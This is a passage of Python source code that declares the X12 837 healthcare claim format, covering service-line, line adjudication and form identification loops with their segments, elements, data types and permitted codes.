Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Drop-off Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Drop-off Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2430 = Loop( "2430", Properties( desc="Line Adjudication Information", looptype="", position="5400", repeat="15", req_sit="S", ), Segment( "SVD", Properties( desc="Line Adjudication Information", position="5400", repeat="1", req_sit="R", syntax="", ), Element( "SVD01", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=1, codes=[], ), ), Element( "SVD02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="03", ), Element( "SVD03-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["ER", "HC", "IV", "WK"], ), ), Element( "SVD03-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SVD03-03", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SVD03-04", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SVD03-05", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SVD03-06", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SVD03-07", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SVD03-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SVD04", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=4, codes=[], ), ), Element( "SVD05", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "SVD06", Properties( desc="Assigned Number", req_sit="S", data_type=("N0", "1", "6"), position=6, codes=[], ), ), ), Segment( "CAS", Properties( desc="Line Adjustment", position="5450", repeat="5", req_sit="S", syntax="L050607 C0605 C0705 L080910 C0908 C1008 L111213 C1211 C1311 L141516 C1514 C1614 L171819 C1817 C1917", ), Element( "CAS01", Properties( desc="Claim Adjustment Group Code", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["CO", "CR", "OA", "PI", "PR"], ), ), Element( "CAS02", Properties( desc="Claim Adjustment Reason Code", req_sit="R", data_type=("ID", "1", "5"), position=2, codes=[], ), ), Element( "CAS03", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "CAS04", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CAS05", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=5, codes=[], ), ), Element( "CAS06", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=6, codes=[], ), ), Element( "CAS07", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CAS08", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=8, codes=[], ), ), Element( "CAS09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), Element( "CAS10", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CAS11", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=11, codes=[], ), ), Element( "CAS12", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=12, codes=[], ), ), Element( "CAS13", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CAS14", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=14, codes=[], ), ), Element( "CAS15", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=15, codes=[], ), ), Element( "CAS16", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=16, codes=[], ), ), Element( "CAS17", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=17, codes=[], ), ), Element( "CAS18", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=18, codes=[], ), ), Element( "CAS19", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=19, codes=[], ), ), ), Segment( "DTP", Properties( desc="Line Check or Remittance Date", position="5500", repeat="1", req_sit="R", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["573"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Remaining Patient Liability", position="5505", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["EAF"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), ) parsed_837_2440 = Loop( "2440", Properties( desc="Form Identification Code", looptype="", position="5510", repeat=">1", req_sit="S", ), Segment( "LQ", Properties( desc="Form Identification Code", position="5510", repeat="1", req_sit="R", syntax="C0102", ), Element( "LQ01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["AS", "UT"], ), ), Element( "LQ02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=2, codes=[], ), ), ), Segment( "FRM", Properties( desc="Supporting Documentation", position="5520", repeat="99", req_sit="R", syntax="R02030405", ), Element( "FRM01", Properties( desc="Assigned Identification", req_sit="R", data_type=("AN", "1", "20"), position=1, codes=[], ), ), Element( "FRM02", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=2, codes=["N", "W", "Y"], ), ), Element( "FRM03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "FRM04", Properties( desc="Date", req_sit="S", data_type=("DT", "8", "8"), position=4, codes=[], ), ), Element( "FRM05", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), ), ) parsed_837_2400 = Loop( "2400", Properties( desc="Service Line Number", looptype="", position="3650", repeat="50", req_sit="R", ), Segment( "LX", Properties( desc="Service Line Number", position="3650", repeat="1", req_sit="R", syntax="", ), Element( "LX01", Properties( desc="Assigned Number", req_sit="R", data_type=("N0", "1", "6"), position=1, codes=[], ), ), ), Segment( "SV1", Properties( desc="Professional Service", position="3700", repeat="1", req_sit="R", syntax="P0304", ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="01", ), Element( "SV101-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["ER", "HC", "IV", "WK"], ), ), Element( "SV101-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SV101-03", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SV101-04", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SV101-05", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SV101-06", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SV101-07", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SV101-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SV102", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "SV103", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["MJ", "UN"], ), ), Element( "SV104", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "SV105", Properties( desc="Facility Code Value", req_sit="S", data_type=("AN", "1", "2"), position=5, codes=[], ), ), Element( "SV106", Properties( desc="Service Type Code", req_sit="N", data_type=("ID", "1", "2"), position=6, codes=[], ), ), Composite( "C004", Properties( desc="Composite Diagnosis Code Pointer", refdes="", repeat="", req_sit="R", seq="07", ), Element( "SV107-01", Properties( desc="Diagnosis Code Pointer", req_sit="R", data_type=("N0", "1", "2"), position=0, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-02", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=1, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-03", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=2, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-04", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=3, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), ), Element( "SV108", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "SV109", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=9, codes=["Y"], ), ), Element( "SV110", Properties( desc="Multiple Procedure Code", req_sit="N", data_type=("ID", "1", "2"), position=10, codes=[], ), ), Element( "SV111", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=11, codes=["Y"], ), ), Element( "SV112", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=12, codes=["Y"], ), ), Element( "SV113", Properties( desc="Review Code", req_sit="N", data_type=("ID", "1", "2"), position=13, codes=[], ), ), Element( "SV114", Properties( desc="National or Local Assigned Review Value", req_sit="N", data_type=("AN", "1", "2"), position=14, codes=[], ), ), Element( "SV115", Properties( desc="Copay Status Code", req_sit="S", data_type=("ID", "1", "1"), position=15, codes=["0"], ), ), Element( "SV116", Properties( desc="Health Care Professional Shortage Area Code", req_sit="N", data_type=("ID", "1", "1"), position=16, codes=[], ), ), Element( "SV117", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=17, codes=[], ), ), Element( "SV118", Properties( desc="Postal Code", req_sit="N", data_type=("ID", "3", "15"), position=18, codes=[], ), ), Element( "SV119", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=19, codes=[], ), ), Element( "SV120", Properties( desc="Level of Care Code", req_sit="N", data_type=("ID", "1", "1"), position=20, codes=[], ), ), Element( "SV121", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=21, codes=[], ), ), ), Segment( "SV5", Properties( desc="Durable Medical Equipment Service", position="4000", repeat="1", req_sit="S", syntax="R0405 C0604", ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="01", ), Element( "SV501-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["HC"], ), ), Element( "SV501-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SV501-03", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SV501-04", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SV501-05", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SV501-06", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SV501-07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SV501-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SV502", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["DA"], ), ), Element( "SV503", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=3, codes=[], ), ), Element( "SV504", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "SV505", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=5, codes=[], ), ), Element( "SV506", Properties( desc="Frequency Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["1", "4", "6"], ), ), Element( "SV507", Properties( desc="Prognosis Code", req_sit="N", data_type=("ID", "1", "1"), position=7, codes=[], ), ), ), Segment( "PWK", Properties( desc="Line Supplemental Information", position="4200", repeat="10", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "03", "04", "05", "06", "07", "08", "09", "10", "11", "13", "15", "21", "A3", "A4", "AM", "AS", "B2", "B3", "B4", "BR", "BS", "BT", "CB", "CK", "CT", "D2", "DA", "DB", "DG", "DJ", "DS", "EB", "HC", "HR", "I5", "IR", "LA", "M1", "MT", "NN", "OB", "OC", "OD", "OE", "OX", "OZ", "P4", "P5", "PE", "PN", "PO", "PQ", "PY", "PZ", "RB", "RR", "RT", "RX", "SG", "V5", "XP", ], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AA", "BM", "EL", "EM", "FT", "FX"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=5, codes=["AC"], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "PWK", Properties( desc="Durable Medical Equipment Certificate of Medical Necessity Indicator", position="4200", repeat="1", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["CT"], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AB", "AD", "AF", "AG", "NS"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "CR1", Properties( desc="Ambulance Transport Information", position="4250", repeat="1", req_sit="S", syntax="P0102 P0506", ), Element( "CR101", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=1, codes=["LB"], ), ), Element( "CR102", Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CR103", Properties( desc="Ambulance Transport Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), Element( "CR104", Properties( desc="Ambulance Transport Reason Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["A", "B", "C", "D", "E"], ), ), Element( "CR105", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=5, codes=["DH"], ), ), Element( "CR106", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR107", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=7, codes=[], ), ), Element( "CR108", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=8, codes=[], ), ), Element( "CR109", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=9, codes=[], ), ), Element( "CR110", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), ), Segment( "CR3", Properties( desc="Durable Medical Equipment Certification", position="4350", repeat="1", req_sit="S", syntax="P0203", ), Element( "CR301", Properties( desc="Certification Type Code", req_sit="R", data_type=("ID", "1", "1"), position=1, codes=["I", "R", "S"], ), ), Element( "CR302", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["MO"], ), ), Element( "CR303", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=3, codes=[], ), ), Element( "CR304", Properties( desc="Insulin Dependent Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Element( "CR305", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=5, codes=[], ), ), ), Segment( "CRC", Properties( desc="Ambulance Certification", position="4500", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["07"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), ), Segment( "CRC", Properties( desc="Hospice Employee Indicator", position="4500", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["70"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["65"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=[], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "CRC", Properties( desc="Condition Indicator/Durable Medical Equipment", position="4500", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["09"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["38", "ZV"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["38", "ZV"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=["38", "ZV"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=["38", "ZV"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=["38", "ZV"], ), ), ), Segment( "DTP", Properties( desc="Date - Service Date", position="4550", repeat="1", req_sit="R", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["472"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8", "RD8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Prescription Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["471"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="DATE - Certification Revision/Recertification Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["607"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Begin Therapy Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["463"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Certification Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["461"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Seen Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["304"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Test Date", position="4550", repeat="2", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["738", "739"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Shipped Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["011"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last X-ray Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["455"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Initial Treatment Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["454"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "QTY", Properties( desc="Ambulance Patient Count", position="4600", repeat="1", req_sit="S", syntax="E0204 R0204", ), Element( "QTY01", Properties( desc="Quantity Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["PT"], ), ), Element( "QTY02", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), Element( "QTY04", Properties( desc="Free-form Information", req_sit="N", data_type=("AN", "1", "30"), position=4, codes=[], ), ), ), Segment( "QTY", Properties( desc="Obstetric Anesthesia Additional Units", position="4600", repeat="1", req_sit="S", syntax="E0204 R0204", ), Element( "QTY01", Properties( desc="Quantity Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["FL"], ), ), Element( "QTY02", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), Element( "QTY04", Properties( desc="Free-form Information", req_sit="N", data_type=("AN", "1", "30"), position=4, codes=[], ), ), ), Segment( "MEA", Properties( desc="Test Result", position="4620", repeat="5", req_sit="S", syntax="R03050608 L050412 L060412 L07030506 E0803 P1112", ), Element( "MEA01", Properties( desc="Measurement Reference ID Code", req_sit="R", data_type=("ID", "2", "2"), 